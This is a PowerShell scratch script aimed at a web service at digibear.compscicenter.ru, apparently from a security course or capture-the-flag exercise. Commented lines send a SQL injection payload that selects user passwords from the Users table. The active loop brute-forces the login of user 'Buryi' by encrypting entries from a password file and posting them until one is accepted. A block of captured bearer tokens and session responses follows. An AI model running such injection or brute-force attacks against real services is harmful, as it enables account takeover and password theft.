# $d = '{"username":"1vpktra","encryptedPassword":"BTUAAIB7AACmXgAA"}'

# Invoke-WebRequest -Uri 'http://digibear.compscicenter.ru/users' `
# 	-Method POST -Body $d



# $d = '{"username":"1vpktra","encryptedPassword":"BTUAAIB7AACmXgAA"}'
# $r = Invoke-WebRequest -Uri 'http://digibear.compscicenter.ru/login' `
# 	-Method POST -Body $d

# $token =
# "ep4AAF0/AABJnwAAxD0AAE0SAAAoCwAANswAAJQiAABdPwAA3H0AAF0/AAAFwgAAeHMAAHhzAAD5ZAAAlCIAAE0SAAD5ZAAAeHMAAJsdAAD5ZAAApl4AAE0SAAB12AAAmx0AAH9JAACAewAABTUAAP0UAACbHQAAXzwAAKZeAAB12AAAXVkAAJsdAAB4cwAA5rAAANLFAAAFwgAATRIAAP0UAABNEgAATRIAAF1ZAADSxQAAyiUAAAXCAABdPwAA82MAAF0/AABNEgAAkqEAAGKSAADUdwAAKAsAAE0SAAAcBQAA/RQAAJldAABNEgAAXT8AANx9AABdPwAAgHsAANLFAAAFNQAAXzwAAJsdAAAFNQAAgHsAAJsdAAAFNQAAyiUAAD4hAACAewAABTUAANx9AAB/SQAAddgAANx9AAAFNQAAddgAAFu7AAAFNQAAddgAAAU1AADKJQAA+WQAAPlkAACaYwAA0sUAANLFAADcfQAA0sUAANLFAABdPwAApHQAAA=="
# 

# $postData = "{data:`");`' SELECT password as id FROM [main].[Users] WHERE id = 1;`"}"
# $postR = Invoke-WebRequest -Uri 'http://digibear.compscicenter.ru/data' `
#  	-Method POST `
#  	-Header @{'Authorization' = "Bearer $token" } `
#  	-Body $postData
# 
# "postR:"
#  $postR.Content

# $data = '{data:"''); SELECT password as id FROM [main].[Users] WHERE id = 1;"}' 
# & curl -H "Authorization: Bearer $token" http://digibear.compscicenter.ru/data -d $data


cat .\passwords2.txt | %{ 
	$_
	$encP = & dotnet .\bin\Debug\netcoreapp2.1\publish\i.dll $_
	$ans = & curl http://digibear.compscicenter.ru/login -d "{username:'Buryi', encryptedPassword:'$encP'}" -s
	if ($ans) {
		$ans
		break
	}
}


@"
ep4AAF0/AABJnwAAxD0AAE0SAAAoCwAANswAAJQiAABdPwAA3H0AAF0/AAB/SQAAf0kAAF88AABdWQAA0sUAAP0UAAD5ZAAAddgAAJsdAABNEgAAgHsAAJQiAABfPAAAmx0AAH9JAAAFwgAABcIAAJQiAACbHQAAddgAANLFAADSxQAAddgAAJsdAAB4cwAApl4AAF88AAB4cwAAXzwAAHXYAAAFNQAAf0kAAJQiAAAFwgAA/RQAAP0UAABdPwAA82MAAF0/AABNEgAAkqEAAGKSAADUdwAAKAsAAE0SAAAcBQAA/RQAAJldAABNEgAAXT8AANx9AABdPwAAgHsAANLFAAAFNQAAXzwAAJsdAAAFNQAAgHsAAJsdAADSxQAAyiUAAD4hAAAFNQAAf0kAANx9AACmXgAAXzwAANx9AADSxQAA0sUAAFu7AABfPAAAddgAAF88AADSxQAAgHsAAMolAACaYwAA0sUAANLFAADcfQAA0sUAANLFAABdPwAApHQAAA==

{"userId":"2875ea1c-a1fa-4cd9-8862-0b31f37842b4","expireDate":"2018-12-06T17:38:00.898026+03:00"}
ep4AAF0/AABJnwAAxD0AAE0SAAAoCwAANswAAJQiAABdPwAA3H0AAF0/AACAewAAXzwAAPlkAAB4cwAATRIAAP0UAAAFNQAABcIAAJsdAAD9FAAABTUAAF1ZAAD9FAAAmx0AAH9JAAAFwgAAlCIAAHXYAACbHQAAXzwAAF88AADKJQAAgHsAAJsdAADSxQAA5rAAAKZeAAAFNQAAXVkAAKZeAAD5ZAAAXzwAAH9JAACAewAA5rAAAH9JAABdPwAA82MAAF0/AABNEgAAkqEAAGKSAADUdwAAKAsAAE0SAAAcBQAA/RQAAJldAABNEgAAXT8AANx9AABdPwAAgHsAANLFAAAFNQAAXzwAAJsdAAAFNQAAgHsAAJsdAADSxQAAyiUAAD4hAAAFNQAA+WQAANx9AACmXgAAXzwAANx9AADSxQAA0sUAAFu7AABfPAAAddgAAF88AADSxQAAgHsAAMolAACaYwAA0sUAAKZeAADcfQAA0sUAANLFAABdPwAApHQAAA== 

{"userId":"2875ea1c-a1fa-4cd9-8862-0b31f37842b4","expireDate":"2018-12-18T02:38:00.898026+03:00"}
{token =
  "ep4AAF0/AABJnwAAxD0AAE0SAAAoCwAANswAAJQiAABdPwAA3H0AAF0/AACAewAAXzwAAPlkAAB4cwAATRIAAP0UAAAFNQAABcIAAJsdAAD9FAAABTUAAF1ZAAD9FAAAmx0AAH9JAAAFwgAAlCIAAHXYAACbHQAAXzwAAF88AADKJQAAgHsAAJsdAADSxQAA5rAAAKZeAAAFNQAAXVkAAKZeAAD5ZAAAXzwAAH9JAACAewAA5rAAAH9JAABdPwAA82MAAF0/AABNEgAAkqEAAGKSAADUdwAAKAsAAE0SAAAcBQAA/RQAAJldAABNEgAAXT8AANx9AABdPwAAgHsAANLFAAAFNQAAXzwAAJsdAAAFNQAAgHsAAJsdAAAFNQAAXzwAAD4hAADSxQAAgHsAANx9AACmXgAAXzwAANx9AADSxQAA0sUAAFu7AABfPAAAddgAAF88AADSxQAAgHsAAMolAACaYwAA0sUAAKZeAADcfQAA0sUAANLFAABdPwAApHQAAA==";
 expireDate = 2018-12-18 02:38:00;}


"ep4AAF0/AABJnwAAxD0AAE0SAAAoCwAANswAAJQiAABdPwAA3H0AAF0/AAB/SQAAf0kAAF88AABdWQAA0sUAAP0UAAD5ZAAAddgAAJsdAABNEgAAgHsAAJQiAABfPAAAmx0AAH9JAAAFwgAABcIAAJQiAACbHQAAddgAANLFAADSxQAAddgAAJsdAAB4cwAApl4AAF88AAB4cwAAXzwAAHXYAAAFNQAAf0kAAJQiAAAFwgAA/RQAAP0UAABdPwAA82MAAF0/AABNEgAAkqEAAGKSAADUdwAAKAsAAE0SAAAcBQAA/RQAAJldAABNEgAAXT8AANx9AABdPwAAgHsAANLFAAAFNQAAXzwAAJsdAAAFNQAAgHsAAJsdAAAFNQAAXzwAAD4hAADSxQAAgHsAANx9AACmXgAAXzwAANx9AADSxQAA0sUAAFu7AABfPAAAddgAAF88AADSxQAAgHsAAMolAACaYwAA0sUAAKZeAADcfQAA0sUAANLFAABdPwAApHQAAA=="
"@
